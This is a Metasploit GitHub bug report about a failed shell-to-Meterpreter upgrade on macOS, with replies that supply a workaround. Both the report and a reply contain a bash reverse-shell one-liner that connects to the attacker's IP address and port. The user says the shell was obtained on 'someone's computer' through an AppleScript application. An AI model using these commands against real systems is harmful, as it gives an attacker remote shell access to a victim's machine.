Metasploit-framework: Shell to meterpreter printf error

Created on 22 May 2018 · 3 Comments · Source: rapid7/metasploit-framework

  1. I run: use multi/handler, set payload osx/x64/shell_reverse_tcp, set LHOST 10.148.91.234, set LPORT 1235, exploit -j -z.
  2. I get a shell on someone's computer using an AppleScript application executing the code "bash -i >& /dev/tcp/10.148.91.234/1235 0>&1 2>&1"
  3. I then run:

msf exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.148.91.234:4433
[*] Command stager progress: 3.14% (1700/54114 bytes)
[-] Error: Unable to execute the following command: "printf '\0\0\0\0\20\0\0\0\0\0\0\0\60\0\0\0\0\0\0\0\20\0\0\0\0\0\0\7\0\0\0\3\0\0\0\5\0\0\0\0\0\0\0\137\137\160\162\157\147\162\141\155\137\166\141\162\163\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\0\60\0\0\1\0\0\0\50\0\0\0\0\0\0\0\0\60\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\137\137\156\154\137\163\171\155\142\157\154\137\160\164\162\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\50\60\0\0\1\0\0\0\20\0\0\0\0\0\0\0\50\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\137\137\147\157\164\0\0\0\0\0\0\0\0\0\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\70\60\0\0\1\0\0\0\10\0\0\0\0\0\0\0\70\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\137\137\154\141\137\163\171\155\142\157\154\137\160\164\162\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\100\60\0\0\1\0\0\0\60\0\0\0\0\0\0\0\100\60\0\0\3\0\0\0\0\0\0\0\0\0\0\0\7\0\0\0\11\0\0\0\0\0\0\0\0\0\0\0\137\137\143\157\155\155\157\156\0\0\0\0\0\0\0\0\137\137\104\101\124\101\0\0\0\0\0\0\0\0\0\0\160\60\0\0\1\0\0\0\40\0\0\0\0\0\0\0\0\0\0\0\3\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\31\0\0\0\110\0\0\0\137\137\114\111\116\113\105\104\111\124\0\0\0\0\0\0\0\100\0\0\1\0\0\0\0\20\0\0\0\0\0\0\0\100\0\0\0\0\0\0\64\3\0\0\0\0\0\0\7\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\42\0\0\200\60\0\0\0\0\100\0\0\10\0\0\0\10\100\0\0\70\0\0\0\0\0\0\0\0\0\0\0\100\100\0\0\140\0\0\0\240\100\0\0\170\0\0\0\2\0\0\0\30\0\0\0\40\101\0\0\21\0\0\0\154\102\0\0\310\0\0\0\13\0\0\0\120\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\7\0\0\0\11\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\60\102\0\0\17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\16\0\0\0\40\0\0\0\14\0\0\0\57\165\163\162\57\154\151\142\57\144\171'>>/tmp/LDYya"
[-] Output: "bash-3.2$"
[*] Stopping exploit/multi/handler

It should upgrade the shell to a meterpreter session

Instead it has that printf error and doesn't create a new meterpreter session

Metasploit version:

Framework: 4.16.57-dev-a7817564eac02767f107349c8426d67a3eba00cd
Console : 4.16.57-dev-a7817564eac02767f107349c8426d67a3eba00cd

I installed metasploit using the latest OSX nightly installer

I am running metasploit on Mac OS Sierra 10.12.6

bug osx

All 3 comments

For some reason the bash -i is breaking the stager.
As a workaround you can simply remove -i, e.g.:
bash >& /dev/tcp/10.148.91.234/1235 0>&1 2>&1

For some reason shell_to_meterpreter is treating any return value from cmd_exec as an error (including the bash-3.2$ prompt on an interactive shell):
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L239
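An added example (not Metasploit's code and not part of the comment above) that models the behaviour described: with `bash -i` and `2>&1`, the interactive prompt written to stderr is merged into the command output, so a check that treats any non-empty output as an error fails even when the command succeeded. The prompt regex, the function names and the sample captures are assumptions constructed for the illustration.

```ruby
# Constructed model of the "any output is an error" check versus a
# prompt-aware one. Not the shell_to_meterpreter module's own code.

# Assumed prompt shapes: the "bash-3.2$" prompt from the report, plus the
# common user@host:dir$ form. This regex is an assumption, not Metasploit's.
PROMPT_RE = /\A(?:bash-\d+\.\d+|[\w.-]+@[\w.-]+:[^\s]*)[\$#]\s*\z/

# Naive check, as the comment describes it: any non-empty output is an error.
def naive_stager_error?(output)
  !output.strip.empty?
end

# Drop blank lines and lines that consist only of a shell prompt, leaving
# whatever the command itself actually wrote.
def strip_prompts(output)
  output.lines.map(&:chomp).reject do |line|
    line.strip.empty? || line =~ PROMPT_RE
  end
end

# Prompt-aware check: only output that survives prompt stripping counts.
def prompt_aware_stager_error?(output)
  !strip_prompts(output).empty?
end

# Constructed sample captures, modelled on the report.
NON_INTERACTIVE = ""                                   # plain "bash": silent success
INTERACTIVE_OK  = "bash-3.2$ "                         # "bash -i": prompt only, command succeeded
INTERACTIVE_ERR = "bash: /tmp/LDYya: Permission denied\nbash-3.2$ " # constructed real failure

if __FILE__ == $PROGRAM_NAME
  [NON_INTERACTIVE, INTERACTIVE_OK, INTERACTIVE_ERR].each do |capture|
    puts "#{capture.inspect}: naive=#{naive_stager_error?(capture)} " \
         "prompt_aware=#{prompt_aware_stager_error?(capture)}"
  end
end
```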

Thank you so much. It worked. It's weird though because one day it worked and another it didn't. Someone must have changed something.
